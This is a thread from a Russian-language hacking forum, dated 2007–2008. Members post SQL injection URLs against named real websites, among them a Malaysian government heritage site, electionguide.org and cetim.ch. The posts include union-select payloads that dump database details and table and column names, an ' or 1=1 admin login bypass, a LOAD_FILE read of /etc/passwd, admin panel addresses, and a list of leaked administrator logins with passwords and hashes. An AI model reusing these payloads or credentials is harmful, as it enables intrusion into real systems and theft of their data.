06.12.2007, 22:50
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 6
С нами:
9763454
Репутация:
19
|
|
http://www.eduvluki.ru
Код:
http://www.eduvluki.ru/metod/level2.php?id=-178+union+select+concat_ws(0x3a,user_login,user_passwd)+from+arc_users/*
Админка
Код:
http://www.eduvluki.ru/admin/
|
|
|
11.12.2007, 16:04
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
www.electionguide.org
Код:
http://www.electionguide.org/country-news.php?ID=-131+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/*
4.1.20:eguide@localhost:eguide (вывод в титле)
найдена таблица - users, дальше пока никак....
|
|
|
|
11.12.2007, 16:25
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от 5taY3r
www.electionguide.org
найдена таблица - users, дальше пока никак....
Код:
http://www.electionguide.org/admin/login.php
Username:' or 1=1/* Password:Nea7
|
|
|
|
11.12.2007, 16:50
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
www.altruism.com.my
Код:
http://www.altruism.com.my/index.php?p=lb-detail&fid=-17+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/*
4.1.22-community-nt:dbaatweb@localhost:atweb
|
|
|
|
11.12.2007, 18:53
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
www.heritage.gov.my
скуля:
Код:
http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+version(),2,3,4,5,6,7/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83
5.0.45
таблицы:
Код:
http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+TABLE_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83
интересные:
'buku_tamu'-'nama'(логин),'emel'(мыло)
'pentadbir' -'nama'(логин админов),'katalaluan'(пасс админов)...
в названиях чуть голову не сломал...)
Код:
http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+COLUMN_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(112,101,110,116,97,100,98,105,114)/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83
логин:пасс
nanie:9dRozi0uyhUnE
zuraihan:f0tjlY5WLfiik
murugan:murugan
anishariah:$1$4FXU.gOL$IGKdSMr1BYdgIz3lMJMFH1
админка:
Код:
http://www.heritage.gov.my/kekkwa/webadmin/index.php
|
|
|
|
11.12.2007, 21:10
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Код HTML:
http://www.dmsbg.com/projects_details_actual.php?id=-39+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11/*
Не смог подобрать имена таблиц. Я завещаю вам продолжить мое благородное дело  |
|
|
|
28.12.2007, 22:49
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от 159932
есть member
для паса не нашёл
хацкеры. таблица - admin , колонки - username, password
|
|
|
|
29.12.2007, 01:29
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Сообщение от 159932
ну я думал что он их пробил ... раз до мемберс дошёл ... и проверять не стал ...
Блин, представляете, все перебрал, а про admin забыл
Бывает иногда...
|
|
|
|
04.01.2008, 02:34
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
www.cetim.ch
Код HTML:
http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
5.0.45-log:cetimweb@imu129.infomaniak.ch:cetimch
Код HTML:
http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd'),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
|
|
|
|
07.01.2008, 22:14
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами:
10065986
Репутация:
785
|
|
edinteractive.co.uk
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6/*
USER:ediadmin@scary
VERSION:5.0.45-community-log
DATABASE:edi
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,column_name,4,5,6+from+information_schema.columns/*
- названия всех колонок
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,table_name,4,5,6+from+information_schema.tables/*
- названия всех таблиц
Имя проекта CMC )
Код HTML:
http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,concat(id,0x3a,project_name,0x3a,website_link),4,5,6+from+aei_portfolio/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
